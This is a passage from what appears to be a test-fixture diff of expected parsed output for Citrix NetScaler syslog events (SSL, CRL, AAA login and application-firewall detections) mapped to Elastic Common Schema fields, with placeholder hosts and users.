"organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.0", + "port": 443 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "tls": { + "cipher": "ECDHE-RSA-AES256-GCM-SHA384" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_SUCCESS 4471 0 : Backend SPCBId 256 - ServerIP 1.128.0.0 - ServerPort 843 - ProtocolVersion TLS1.3 - CipherSuite \"TLS_AES_128_GCM_SHA256\" - Session 0x12a7c0", + "device_event_class_id": "SSLLOG", + "extended": { + "message": "Backend SPCBId 256 - ServerIP 1.128.0.0 - ServerPort 843 - ProtocolVersion TLS1.3 - CipherSuite \"TLS_AES_128_GCM_SHA256\" - Session 0x12a7c0" + }, + "facility": "local0", + "host": "ns1", + "name": "SSL_HANDSHAKE_SUCCESS", + "priority": "info" + }, + "citrix_adc": { + "log": { + "cipher_suite": "TLS_AES_128_GCM_SHA256", + "message": "Backend SPCBId 256 - ServerIP 1.128.0.0 - ServerPort 843 - ProtocolVersion TLS1.3 - CipherSuite \"TLS_AES_128_GCM_SHA256\" - Session 0x12a7c0", + "protocol_version": "TLS1.3", + "server": { + "ip": "1.128.0.0", + "port": 843 + }, + "session": "0x12a7c0", + "spcb_id": "256" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_SUCCESS 4471 0 : Backend SPCBId 256 - ServerIP 1.128.0.0 - ServerPort 843 - ProtocolVersion TLS1.3 - CipherSuite \"TLS_AES_128_GCM_SHA256\" - Session 0x12a7c0", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.0", + "81.2.69.144" + ] + }, + "source": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.0", + "port": 843 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "tls": { + "cipher": "TLS_AES_128_GCM_SHA256" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_CERT_EXPIRY_IMMINENT 4471 0 : Certificate Key Pair RSA2048 - Days To Expire 365", + "device_event_class_id": "SSLLOG", + "extended": { + "message": "Certificate Key Pair RSA2048 - Days To Expire 365" + }, + "facility": "local0", + "host": "ns1", + "name": "SSL_CERT_EXPIRY_IMMINENT", + "priority": "info" + }, + "citrix_adc": { + "log": { + "certificate_key_pair": "RSA2048", + "days_to_expire": 365, + "message": "Certificate Key Pair RSA2048 - Days To Expire 365" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_CERT_EXPIRY_IMMINENT 4471 0 : Certificate Key Pair RSA2048 - Days To Expire 365", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_ISSUERNAME 4471 0 : SPCBId 512 - Issuer Name \"CN=Example CA, O=Example Organization, C=US\"", + "device_event_class_id": "SSLLOG", + "extended": { + "message": "SPCBId 512 - Issuer Name \"CN=Example CA, O=Example Organization, C=US\"" + }, + "facility": "local0", + "host": "ns1", + "name": "SSL_HANDSHAKE_ISSUERNAME", + "priority": "info" + }, + "citrix_adc": { + "log": { + "issuer_name": "CN=Example CA, O=Example Organization, C=US", + "message": "SPCBId 512 - Issuer Name \"CN=Example CA, O=Example Organization, C=US\"", + "spcb_id": "512" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_ISSUERNAME 4471 0 : SPCBId 512 - Issuer Name \"CN=Example CA, O=Example Organization, C=US\"", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "tls": { + "server": { + "issuer": "CN=Example CA, O=Example Organization, C=US" + } + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_SUBJECTNAME 4471 0 : SPCBId 1024 - Subject Name \"CN=www.example.com, O=Example Company, C=US\"", + "device_event_class_id": "SSLLOG", + "extended": { + "message": "SPCBId 1024 - Subject Name \"CN=www.example.com, O=Example Company, C=US\"" + }, + "facility": "local0", + "host": "ns1", + "name": "SSL_HANDSHAKE_SUBJECTNAME", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "SPCBId 1024 - Subject Name \"CN=www.example.com, O=Example Company, C=US\"", + "spcb_id": "1024", + "subject_name": "CN=www.example.com, O=Example Company, C=US" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_SUBJECTNAME 4471 0 : SPCBId 1024 - Subject Name \"CN=www.example.com, O=Example Company, C=US\"", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "tls": { + "server": { + "subject": "CN=www.example.com, O=Example Company, C=US" + } + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_CRL_UPDATE_SUCCESS 4471 0 : crl_name ExampleCRL - server_ip 1.128.0.0 - server_port 389 - method LDAP - ldapscope SUB", + "device_event_class_id": "SSLLOG", + "extended": { + "message": "crl_name ExampleCRL - server_ip 1.128.0.0 - server_port 389 - method LDAP - ldapscope SUB" + }, + "facility": "local0", + "host": "ns1", + "name": "SSL_CRL_UPDATE_SUCCESS", + "priority": "info" + }, + "citrix_adc": { + "log": { + "crl_name": "ExampleCRL", + "ldap_scope": "SUB", + "message": "crl_name ExampleCRL - server_ip 1.128.0.0 - server_port 389 - method LDAP - ldapscope SUB", + "method": "LDAP", + "server": { + "ip": "1.128.0.0", + "port": 389 + } + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_CRL_UPDATE_SUCCESS 4471 0 : crl_name ExampleCRL - server_ip 1.128.0.0 - server_port 389 - method LDAP - ldapscope SUB", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "http": { + "request": { + "method": "LDAP" + } + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.0", + "81.2.69.144" + ] + }, + "source": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.0", + "port": 389 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_CRL_UPDATE_FAILURE 4471 0 : crl_name AnotherCRL - server_ip 1.128.0.0 - server_port 636 - method LDAP - ldapscope BASE", + "device_event_class_id": "SSLLOG", + "extended": { + "message": "crl_name AnotherCRL - server_ip 1.128.0.0 - server_port 636 - method LDAP - ldapscope BASE" + }, + "facility": "local0", + "host": "ns1", + "name": "SSL_CRL_UPDATE_FAILURE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "crl_name": "AnotherCRL", + "ldap_scope": "BASE", + "message": "crl_name AnotherCRL - server_ip 1.128.0.0 - server_port 636 - method LDAP - ldapscope BASE", + "method": "LDAP", + "server": { + "ip": "1.128.0.0", + "port": 636 + } + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_CRL_UPDATE_FAILURE 4471 0 : crl_name AnotherCRL - server_ip 1.128.0.0 - server_port 636 - method LDAP - ldapscope BASE", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "http": { + "request": { + "method": "LDAP" + } + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.0", + "81.2.69.144" + ] + }, + "source": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.0", + "port": 636 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_OCSPURL_RESOLVE_SUCCESS 4471 0 : Domainname example.com Ipaddress 1.128.0.0", + "device_event_class_id": "SSLLOG", + "extended": { + "message": "Domainname example.com Ipaddress 1.128.0.0" + }, + "facility": "local0", + "host": "ns1", + "name": "SSL_OCSPURL_RESOLVE_SUCCESS", + "priority": "info" + }, + "citrix_adc": { + "log": { + "domain_name": "example.com", + "ip_address": "1.128.0.0", + "message": "Domainname example.com Ipaddress 1.128.0.0" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_OCSPURL_RESOLVE_SUCCESS 4471 0 : Domainname example.com Ipaddress 1.128.0.0", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144", + "1.128.0.0" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "domain": "example.com" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_OCSPURL_RESOLVE_FAILURE 4471 0 : Domainname example.net Ipaddress 1.128.0.0", + "device_event_class_id": "SSLLOG", + "extended": { + "message": "Domainname example.net Ipaddress 1.128.0.0" + }, + "facility": "local0", + "host": "ns1", + "name": "SSL_OCSPURL_RESOLVE_FAILURE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "domain_name": "example.net", + "ip_address": "1.128.0.0", + "message": "Domainname example.net Ipaddress 1.128.0.0" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_OCSPURL_RESOLVE_FAILURE 4471 0 : Domainname example.net Ipaddress 1.128.0.0", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144", + "1.128.0.0" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "domain": "example.net" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SUBSCRIBER SESSION_EVENT 4471 0 : Session 12345", + "device_event_class_id": "SUBSCRIBER", + "extended": { + "message": "Session 12345" + }, + "facility": "local0", + "host": "ns1", + "name": "SESSION_EVENT", + "priority": "info" + }, + "citrix_adc": { + "log": { + "session": "12345" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SUBSCRIBER SESSION_EVENT 4471 0 : Session 12345", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SUBSCRIBER SESSION_FAILURE 4471 0 : Failure Reason: CredentialsInvalid", + "device_event_class_id": "SUBSCRIBER", + "extended": { + "message": "Failure Reason: CredentialsInvalid" + }, + "facility": "local0", + "host": "ns1", + "name": "SESSION_FAILURE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "failure_reason": "CredentialsInvalid" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SUBSCRIBER SESSION_FAILURE 4471 0 : Failure Reason: CredentialsInvalid", + "reason": "CredentialsInvalid", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : AAA LOGIN_FAILED 4471 0 : User john.doe - Client_ip 192.168.1.104 - Failure_reason \"Invalid password\" - Browser Chrome", + "device_event_class_id": "AAA", + "extended": { + "message": "User john.doe - Client_ip 192.168.1.104 - Failure_reason \"Invalid password\" - Browser Chrome" + }, + "facility": "local0", + "host": "ns1", + "name": "LOGIN_FAILED", + "priority": "info" + }, + "citrix_adc": { + "log": { + "browser": "Chrome", + "client_ip": "192.168.1.104", + "failure_reason": "Invalid password", + "user": "john.doe" + } + }, + "client": { + "ip": "192.168.1.104" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : AAA LOGIN_FAILED 4471 0 : User john.doe - Client_ip 192.168.1.104 - Failure_reason \"Invalid password\" - Browser Chrome", + "outcome": "failure", + "reason": "Invalid password", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.104" + ], + "user": [ + "john.doe" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "name": "john.doe" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Other", + "original": "Chrome" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : AAA EXTRACTED_GROUPS 4471 0 : Extracted_groups \"Engineering,Staff\"", + "device_event_class_id": "AAA", + "extended": { + "message": "Extracted_groups \"Engineering,Staff\"" + }, + "facility": "local0", + "host": "ns1", + "name": "EXTRACTED_GROUPS", + "priority": "info" + }, + "citrix_adc": { + "log": { + "groups": "Engineering,Staff" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : AAA EXTRACTED_GROUPS 4471 0 : Extracted_groups \"Engineering,Staff\"", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "group": { + "name": "Engineering,Staff" + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_XMLPAYLOAD_CONTENT_TYPE_MISMATCH 4471 0 : XML Mismatched content-type in HTTP header detected = \"text/plain\".", + "device_event_class_id": "APPFW", + "extended": { + "message": "XML Mismatched content-type in HTTP header detected = \"text/plain\"." + }, + "facility": "local0", + "host": "ns1", + "name": "APPFW_XMLPAYLOAD_CONTENT_TYPE_MISMATCH", + "priority": "info" + }, + "citrix_adc": { + "log": { + "content_type_mismatch": "text/plain", + "message": "XML Mismatched content-type in HTTP header detected = \"text/plain\"." + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_XMLPAYLOAD_CONTENT_TYPE_MISMATCH 4471 0 : XML Mismatched content-type in HTTP header detected = \"text/plain\".", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_DENYURL 4471 0 : Disallow Deny URL for rule pattern = \"http://example.com/badpath\".", + "device_event_class_id": "APPFW", + "extended": { + "message": "Disallow Deny URL for rule pattern = \"http://example.com/badpath\"." + }, + "facility": "local0", + "host": "ns1", + "name": "APPFW_DENYURL", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "Disallow Deny URL for rule pattern = \"http://example.com/badpath\".", + "url": "http://example.com/badpath" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_DENYURL 4471 0 : Disallow Deny URL for rule pattern = \"http://example.com/badpath\".", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "example.com", + "original": "http://example.com/badpath", + "path": "/badpath", + "scheme": "http" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_CONTENT_TYPE 4471 0 : Unknown content-type header value = \"application/unknown\".", + "device_event_class_id": "APPFW", + "extended": { + "message": "Unknown content-type header value = \"application/unknown\"." + }, + "facility": "local0", + "host": "ns1", + "name": "APPFW_CONTENT_TYPE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "Unknown content-type header value = \"application/unknown\".", + "unknown_content_type": "application/unknown" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_CONTENT_TYPE 4471 0 : Unknown content-type header value = \"application/unknown\".", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_REFERER_HEADER 4471 0 : parsing referer header 'http://malicious.com' failed", + "device_event_class_id": "APPFW", + "extended": { + "message": "parsing referer header 'http://malicious.com' failed" + }, + "facility": "local0", + "host": "ns1", + "name": "APPFW_REFERER_HEADER", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "parsing referer header 'http://malicious.com' failed", + "referer_header": "http://malicious.com" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_REFERER_HEADER 4471 0 : parsing referer header 'http://malicious.com' failed", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "http": { + "request": { + "referrer": "http://malicious.com" + } + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_BUFFEROVERFLOW_URL 4471 0 : URL length(2150) is greater than maximum allowed(2048).", + "device_event_class_id": "APPFW", + "extended": { + "message": "URL length(2150) is greater than maximum allowed(2048)." + }, + "facility": "local0", + "host": "ns1", + "name": "APPFW_BUFFEROVERFLOW_URL", + "priority": "info" + }, + "citrix_adc": { + "log": { + "max_allowed": { + "url_length": 2048 + }, + "message": "URL length(2150) is greater than maximum allowed(2048).", + "url_length": 2150 + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_BUFFEROVERFLOW_URL 4471 0 : URL length(2150) is greater than maximum allowed(2048).", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_BUFFEROVERFLOW_COOKIE 4471 0 : Cookie header length(1025) is greater than maximum allowed(1000).", + "device_event_class_id": "APPFW", + "extended": { + "message": "Cookie header length(1025) is greater than maximum allowed(1000)." + }, + "facility": "local0", + "host": "ns1", + "name": "APPFW_BUFFEROVERFLOW_COOKIE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "cookie_header_length": 1025, + "max_allowed": { + "cookie_header_length": 1000 + }, + "message": "Cookie header length(1025) is greater than maximum allowed(1000)." + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_BUFFEROVERFLOW_COOKIE 4471 0 : Cookie header length(1025) is greater than maximum allowed(1000).", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_BUFFEROVERFLOW_HDR 4471 0 : Header(Referer) length(550) is greater than maximum allowed(512).", + "device_event_class_id": "APPFW", + "extended": { + "message": "Header(Referer) length(550) is greater than maximum 